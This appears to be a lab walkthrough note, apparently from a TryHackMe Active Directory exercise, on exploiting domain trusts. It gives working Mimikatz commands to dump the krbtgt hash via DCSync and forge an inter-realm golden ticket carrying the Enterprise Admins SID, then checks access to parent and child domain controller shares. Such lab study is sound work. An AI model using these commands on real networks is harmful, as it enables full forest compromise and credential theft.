Skip to main content

Domain Trusts

info

The Key Concept of Exploiting Domain Trusts is if we take control over the Root Domain we will be in a Position to Compromise all of Regional Domains.


Domain Trusts are a Mechanism for Users in the Network to gain access to other resources in the Domain.

For the most part, trusts outline how the Domain's inside of a Forest Communicate with each other. In some Environments, trusts can be extended out to External Domains and even Forests in some cases. (Forest is a Collection of one or more Domain Trees inside an AD Network)

There are Two main Types of Trusts that can be Configured between Domains:

  • Directional - The Direction of the Trust flows from a Trusting Domain to a Trusted Domain
  • Transitive - The Trust Relationship expands beyond just two Domains to include other Trusted Domains

KRBTGT and Golden Tickets

Required Privileges: Administrators

KRBTGT is the account used for Microsoft's implementation of Kerberos. This account acts as the Service Account for the Kerberos Distribution Center (KDC) Service, which handles all Kerberos Ticket Requests. This Account is used to Encrypt and sign all Kerberos Tickets for the Domain. Since the Password Hash is shared by all Domain Controllers, they can then Verify the Authenticity of the received TGT when Users Request access to Resources.


If we want to Generate our own TGT's to grant us Access to everything, this is known as a Golden Ticket Attack. In a Golden Ticket Attack, we bypass the KDC altogether and create our own TGT's, essentially becoming a Ticket Granting Server (TGS).

In order to forge TGT's, we need the following Information:

  • FQDN of the Domain
  • Security Identifier (SID) of the domain
  • Username of the Account we want to Impersonate
  • KRBTGT Password Hash

KRBTGT Requires a Domain Compromise since the KRBTGT Password Hash is only stored on Domain Controllers

privilege::debug
lsadump::dcsync /user:za\krbtgt


Inter-Realm TGT's

Using the KRBTGT Password Hash, we could now forge a Golden Ticket to access any Resource in the Child Domain.

We can take this a step further by forging an Inter-Realm TGT. Inter-Realm TGT's are used to provide access to resources in other Domains. (Like Exploiting the Bidirectional trust Relationship between the Child and Parent Domain to gain full Access to the Parent Domain)

To do this we need to include extra account SID's from other Domains when we construct the Golden Ticket to perform this Exploit.

We will Exploit the Trust the Parent Domain has with our Child Domain by adding the SID of the Enterprise Admins (EA) group as an extra SID to our forged Ticket for the Domain Controller of the Child Domain. The EA Group belongs to the Parent Domain and Membership to this Group essentially grants Administrative Privileges over the entire Forest.


To exploit this, we need to recover two SID's:

  • SID of the Child Domain Controller (In this Scenario THMDC), which we will Impersonate in our forged TGT
  • SID of the Enterprise Admins in the Parent Domain, which we will add as an extra SID to our forged TGT

# Name of the Child Domain Controller [In this Scenario THMDC]
Get-ADComputer -Identity "THMDC"

# Recover the SID of the Enterprise Admins Group to Query the Parent Domain Controller [In this Scenario thmrootdc.adobe.loc]
Get-ADGroup -Identity "Enterprise Admins" -Server thmrootdc.adobe.loc


Exploiting Domain Trusts

We can use Mimikatz to generate the Golden Ticket.

privilege::debug
kerberos::golden /user:Administrator /domain:za.adobe.loc /sid:S-1-5-21-3885271727-2693558621-2658995185-1001 /service:krbtgt /rc4:<Password Hash of krbtgt User> /sids:<SID of Enterprise Admins Group> /ptt

:: Query Example in this Scenario
kerberos::golden /user:Administrator /domain:za.adobe.loc /sid:S-1-5-21-3885271727-2693558621-2658995185-1001 /service:krbtgt /rc4:16f9af38fca3ada405386b3b57366082 /sids:S-1-5-21-3330634377-1326264276-63


Verifying the Access

First, we will Verify that this Ticket works for access to THMDC since it is a Valid Ticket for the Administrator User of the Child Domain. This is going to Confirm that the Golden Ticket was forged for access to the Child DC.

We can also Verify that the Tickets were correctly Injected with the Windows Built-In Command klist.

:: List Target Machine Contents
dir \\thmdc.za.adobe.loc\c$

:: Displays a list of currently Cached Kerberos Tickets
klist

If we specified extra SID's we should also now have Access to the Parent DC.

:: List Target Machine Contents
dir \\thmrootdc.adobe.loc\c$\